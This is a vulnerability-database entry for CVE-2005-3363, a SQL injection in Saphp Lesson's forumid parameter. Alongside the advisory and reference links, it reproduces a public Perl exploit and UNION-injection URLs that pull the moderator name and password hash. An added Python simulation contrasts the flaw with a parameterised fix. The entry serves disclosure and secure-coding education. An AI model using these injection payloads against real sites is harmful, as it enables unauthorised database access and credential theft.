CVE-2005-3363
CVSS 7.5
Published: 2005-10-30 09:34:00
Last revised: 2016-10-17 23:34:37

[Original] SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.


[CNNVD] Saphp Lesson 'forumid' Parameter SQL Injection Vulnerability (CNNVD-200510-268)

        Saphp Lesson, possibly saphp Lesson 1.1 and saphpLesson 2.0, contains an SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:saphp:saphplesson:1.1
cpe:/a:saphp:saphplesson:2.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3363
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3363
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-268
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=113018965520240&w=2
(UNKNOWN)  BUGTRAQ  20051024 SQL saphp Lesson
http://milw0rm.com/exploits/1530
(UNKNOWN)  MILW0RM  1530
http://securityreason.com/securityalert/111
(UNKNOWN)  SREASON  111
http://www.attrition.org/pipermail/vim/2005-October/000313.html
(UNKNOWN)  VIM  20051029 Saphp Lesson
http://www.securityfocus.com/archive/1/archive/1/430906/30/5610/threaded
(UNKNOWN)  BUGTRAQ  20060412 SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit
http://www.securityfocus.com/archive/1/archive/1/440120/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060711 saphp "add.php" forumid Parameter SQL Injection
http://www.securityfocus.com/archive/1/archive/1/472799/100/0/threaded
(UNKNOWN)  BUGTRAQ  20070704 SQL Injection in saphp "showcat.php"
http://www.securityfocus.com/bid/15185
(UNKNOWN)  BID  15185
http://xforce.iss.net/xforce/xfdb/22861
(UNKNOWN)  XF  saphplesson-multiple-sql-injection(22861)
http://xforce.iss.net/xforce/xfdb/27746
(UNKNOWN)  XF  saphp-add-sql-injection(27746)

- Vulnerability information

Saphp Lesson 'forumid' Parameter SQL Injection Vulnerability
High risk  SQL injection
2005-10-30 00:00:00 2005-10-31 00:00:00
Remote  
        Saphp Lesson, possibly saphp Lesson 1.1 and saphpLesson 2.0, contains an SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.

- Advisories and patches

        No data available

- Vulnerability information (1530)

SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit (EDBID:1530)
php webapps
2006-02-25 Verified
Author: SnIpEr_SA
#!/usr/bin/perl
#
# For password
# http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor
# For username
# http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor
# sent in by SnIpEr_SA (selfar2002[at]hotmail.com)
# ported by str0ke (milw0rm.com)

use LWP::Simple;

$serv = $ARGV[0];   # host name, e.g. www.example.com
$path = $ARGV[1];   # directory holding showcat.php, with leading and trailing slash

sub usage {
    print "\nSaphpLesson 2.0 SQL-Injection \n";
    print "By SnIpEr_SA Ported by str0ke\n";
    print "Usage: $0 www.example.com /directory/\n";
    print "server   -  URL\n";
    print "path     -  path to showcat.php\n";
    exit ();
}

sub exploit {
    print qq(
    SaphpLesson 2.0 SQL-Injection
    By SnIpEr_SA Ported by str0ke\n\n);

    # The injected UNION replaces the forum title with the moderator name;
    # the application echoes it inside the page title as "[value]</title>".
    $URL = sprintf("http://%s%sshowcat.php?forumid=-1+union+select+ModName+from+modretor", $serv, $path);
    $content = get "$URL";
    if ($content =~ /(\[)(.*)(\]\<\/title\>)/) { &user; } else { print "No Workie\n"; }

    # Same injection for the password column; only a 32-character word
    # (the length of an MD5 hex digest) is accepted as a hit.
    $URL = sprintf("http://%s%sshowcat.php?forumid=-1+union+select+ModPassword+from+modretor", $serv, $path);
    $content = get "$URL";
    if ($content =~ /(\[)(\w{32})(\]\<\/title\>)/) { &showh; } else { print "No Workie\n"; }
}

# $2 is the capture from the regex in the calling block (dynamically scoped).
sub user  { print "[*] Username: $2\n"; }
sub showh { print "[*] Hash: $2\n\n"; }

if (@ARGV != 2) { &usage; } else { &exploit; }

# milw0rm.com [2006-02-25]
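To make the mechanism behind the advisory and the exploit above concrete, here is an added Python/sqlite3 simulation; it is not code from Saphp Lesson, from SnIpEr_SA, or from milw0rm. It reproduces the flaw both descriptions on this page name: forumid is concatenated into the SELECT that fills the page title, so a value of -1 UNION SELECT ModPassword FROM modretor swaps the forum title for the moderator hash, which the exploit then reads out of [...]</title>. The table name modretor and the columns ModName/ModPassword are taken from the exploit; the forums table, its rows and the moderator row are constructed for this example. The hardened handler shows the fix the page does not supply: validate that forumid is an integer and bind it as a query parameter. The same change applies to the forumid parameter in add.php.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory schema for this example. The table modretor and
    its columns ModName/ModPassword are the names the public exploit queries;
    the forums table, its rows and the moderator row are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE forums (forumid INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO forums VALUES (1, 'General'), (2, 'Lessons');
        CREATE TABLE modretor (ModName TEXT, ModPassword TEXT);
        INSERT INTO modretor VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return db


def showcat_vulnerable(db, forumid):
    """Mirrors the flaw: the raw forumid parameter is spliced into the SQL.
    A UNION in forumid replaces the forum title with any single column the
    attacker names, and that value is rendered inside the <title> element."""
    sql = "SELECT title FROM forums WHERE forumid=" + forumid
    row = db.execute(sql).fetchone()
    return "<title>[%s]</title>" % (row[0] if row else "")


def is_valid_forumid(forumid):
    """Allow-list check: a short string of decimal digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", forumid) is not None


def showcat_fixed(db, forumid):
    """Hardened handler: reject anything that is not a decimal integer, then
    bind the value as a parameter so it can never be parsed as SQL."""
    if not is_valid_forumid(forumid):
        raise ValueError("forumid must be a decimal integer")
    row = db.execute(
        "SELECT title FROM forums WHERE forumid=?", (int(forumid),)
    ).fetchone()
    return "<title>[%s]</title>" % (row[0] if row else "")


def extract_hash(html):
    """The same test the exploit applies to the response: a 32-character
    word between [ and ] immediately before </title>."""
    m = re.search(r"\[(\w{32})\]</title>", html)
    return m.group(1) if m else None


if __name__ == "__main__":
    db = build_db()
    # forumid=-1+union+select+ModPassword+from+modretor, URL-decoded
    payload = "-1 union select ModPassword from modretor"
    print(showcat_vulnerable(db, "2"))              # normal request
    leaked = showcat_vulnerable(db, payload)
    print(leaked, "->", extract_hash(leaked))        # hash leaks via the title
    try:
        showcat_fixed(db, payload)
    except ValueError as err:
        print("fixed handler rejected payload:", err)
```

Running the script shows the vulnerable handler returning the moderator hash in place of a forum title, while the fixed handler refuses the request before any SQL is built. Parameter binding alone would be enough to stop the injection; the integer allow-list in front of it also gives a clean error for garbage input and makes the contract of the parameter explicit.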

- Vulnerability information

20289
saphp Lesson showcat.php forumid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

saphp Lesson contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'showcat.php' script not properly sanitizing user-supplied input to the 'forumid' variable. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database.

- Timeline

2005-10-24 Unknown
2005-10-24 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author
